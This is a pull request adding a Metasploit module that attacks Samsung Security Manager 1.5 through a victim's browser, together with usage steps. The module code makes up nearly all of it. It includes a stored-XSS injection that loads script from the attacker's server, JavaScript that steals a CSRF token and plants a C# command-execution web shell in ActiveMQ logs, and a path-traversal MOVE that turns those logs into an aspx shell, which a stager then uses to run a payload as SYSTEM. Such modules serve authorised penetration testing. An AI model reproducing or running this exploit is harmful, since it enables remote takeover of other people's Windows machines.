### PR TITLE
Add Samsung Security Manager 1.5 ActiveMQ Broker Service exploit

### DIFF
--- a/modules/exploits/windows/browser/samsung_security_manager_move.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_move.rb
@@ -1,0 +1,200 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Samsung Security Manager 1.5 ActiveMQ Broker Service MOVE Method Remote Code Execution",
+      'Description'    => %q{
+        This is an exploit against Samsung Security Manager that bypasses the patch in CVE-2015-3435
+        by exploiting the vulnerability against the client side. This exploit has been tested successfully
+        against IE, Firefox and Chrome by abusing a GET request XSS to bypass CORS and reach the
+        vulnerable MOVE. It works by injecting C# .Net code into the logs, MOVE'ing the logs to
+        an aspx shell to gain Remote Code Execution as SYSTEM.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mr_me <mr_me[at]offensive-security.com>', # vuln + module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://metasploit.com' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # tested on 1.32, 1.4 & 1.5
+          [ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', {} ],
+        ],
+      'Payload'        => { 'BadChars' => "" },
+      'DisclosureDate' => "Aug 5 2016",
+      'DefaultTarget'  => 0))
+      register_options(
+        [
+          Opt::RPORT(4512),
+          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
+        ], self.class)
+  end
+
+  def execute_command(args, opts)
+    command = "c://Windows//System32//cmd.exe"
+    args    = "/c #{args}"
+    cmd_uri = normalize_uri() + "#{@aspx_name}"
+     res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => cmd_uri,
+      'vars_post' =>
+        {
+          'c' => command,
+          'a' => args
+        }
+      }, 40)
+  end
+
+  # tested on Firefox v46.0.1 (latest)
+  # tested on Chrome v50.0.2661.102 (latest release)
+  # tested on IE v11.0.9600.18314 (latest)
+  def on_request_uri(cli, request)
+
+    js_name    = rand_text_alpha(rand(10)+5) + '.js'
+    @aspx_name = rand_text_alpha(rand(10)+5) + '.aspx'
+    register_files_for_cleanup("C://Program Files//Samsung//SSM//MediaGateway//WebViewer//#{@aspx_name}")
+
+    payload_url =  "http://"
+    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name
+
+    # we deliver the JavaScript code that does the work for us
+    if (request.uri.match(/.js/))
+      return if ((p = regenerate_payload(cli)) == nil)
+
+      # create our back door code
+      csharp = Rex::Text.uri_encode("<%=System.Diagnostics.Process.Start(request(\"c\"),request(\"a\"))%>")
+
+      # this payload gets executed in the local context, essentially giving the middle finger to our target
+      js_content = %Q|
+      function get_csrf() {
+        if (this.readyState == 4) {
+           var res = this.responseText.match(/secret" value="(.*)"/g);
+           var csrf = res.toString().split("=\\\"")[1];
+           csrf = csrf.substring(0, csrf.length - 1);
+           var xhr = new XMLHttpRequest();
+           xhr.open("POST", "http://localhost:8161/admin/createDestination.action", false);
+           xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+           xhr.send("JMSDestinationType=topic&secret=" + csrf + "&JMSDestination=#{csharp}");
+        }
+      }
+
+      function inject_kahadblogs() {
+        var xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = get_csrf;
+        xhr.open("GET", "http://localhost:8161/admin/topics.jsp", true);
+        xhr.withCredentials = true;
+        xhr.send(null);
+        return true;
+      }
+
+      function move_log_to_aspx() {
+        var uri = "http://localhost:8161/fileserver/%5c..%2f%2f..%5c%5cdata%2f%2fkahadb%2f%2fdb.data";
+        var xhr = new XMLHttpRequest();
+        xhr.open("MOVE", uri, true);
+        xhr.setRequestHeader("Destination","http://localhost:8161/C://Program Files//Samsung//SSM//MediaGateway//WebViewer//#{@aspx_name}");
+        xhr.send();
+        return true;
+      }
+
+      function bye_bye_xss(uri){
+        var xhr = new XMLHttpRequest();
+        xhr.open('GET', uri.replace(/\\+/g,"%2b"), true);
+        xhr.send();
+      }
+
+      function clean_up(){
+        var xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function() {
+          if (xhr.readyState == XMLHttpRequest.DONE) {
+            var els = xhr.responseXML.getElementsByTagName("a");
+            for (var i = 0, l = els.length; i < l; i++) {
+              var el = els[i];
+              if (el.href.search("http://localhost:8161/admin/deleteDestination.action") == 0) {
+                bye_bye_xss(el.href);
+              }
+            }
+          }
+        }
+        xhr.open('GET', 'http://localhost:8161/admin/queues.jsp', true);
+        xhr.responseType = "document"; // so that we can parse the reponse as a document
+        xhr.send(null);
+      }
+
+      function start() {
+        inject_kahadblogs(); // injects asp code into the logs
+        setTimeout(move_log_to_aspx, 6000); // creates a aspx file with command execution
+        clean_up(); // cleans the xss
+      }
+      start();
+      |
+
+      if datastore['OBFUSCATE']
+        js_content = ::Rex::Exploitation::JSObfu.new(js_content)
+        js_content.obfuscate
+      end
+
+    # dont exploit again otherwise we get a zillion shells
+    return if session_created? or @exploited
+    print_status("Sending javascript...")
+    send_response_html(cli, js_content, { 'Content-Type' => 'application/javascript' })
+    print_status("Waiting for the log injection and move...")
+    # we have to sleep on this one, since we are unsure of how long exactly the MOVE will take (logs are big)
+    sleep(8)
+    print_status("Starting stager...")
+    @exploited = true
+    execute_cmdstager({:linemax=>3000, :temp=>"c:\\\\"})
+    return
+    end
+
+    if datastore['OBFUSCATE']
+       js_content = ::Rex::Exploitation::JSObfu.new(js_content)
+       js_content.obfuscate
+    end
+
+    iframe_injection = ""
+    # This is done so that we can ensure that we hit our XSS payload since iframes load very fast, we need a few
+    (1..20).step(1) do |n|
+      iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
+    end
+
+    # the stored XSS endpoint
+    target  = "http://localhost:8161/admin/browse.jsp?JMSDestination="
+
+    # we use XSS to execute JavaScript code in local context to avoid CORS
+    xss_injection =  "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
+    xss_injection << "a.src='#{payload_url}';document.body.appendChild(a)\")+\""
+    target << Rex::Text.uri_encode(xss_injection)
+
+    # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
+    # and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSS
+    html_content = %Q|
+    <html><body>
+    <iframe src="#{target}" width="0" height="0"></iframe>
+    #{iframe_injection}
+    </body></html>
+    |
+    print_status("Sending exploit...")
+    send_response_html(cli, html_content)
+    handler(cli)
+
+  end
+end


### PR DESCRIPTION
## What This Module Does

This is an exploit against Samsung Security Manager that bypasses the patch in CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has been tested successfully against IE, Firefox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable MOVE. It works by injecting C# .Net code into the logs, MOVE'ing the logs to an aspx shell to gain Remote Code Execution as SYSTEM.
## Verification
- [ ] Install Samsung Security Manager (1.4) on a Windows box
- [ ] Start msfconsole
- [ ] Do: `use exploits/windows/browser/samsung_security_manager_move`
- [ ] Do: `set payload [payload path]`
- [ ] Do: `set rhost [IP]`
- [ ] Do: `set lhost [IP]`
- [ ] Do: `set lport [port]`
- [ ] Do: `exploit`
- [ ] Visit the malicious link. You should get a session
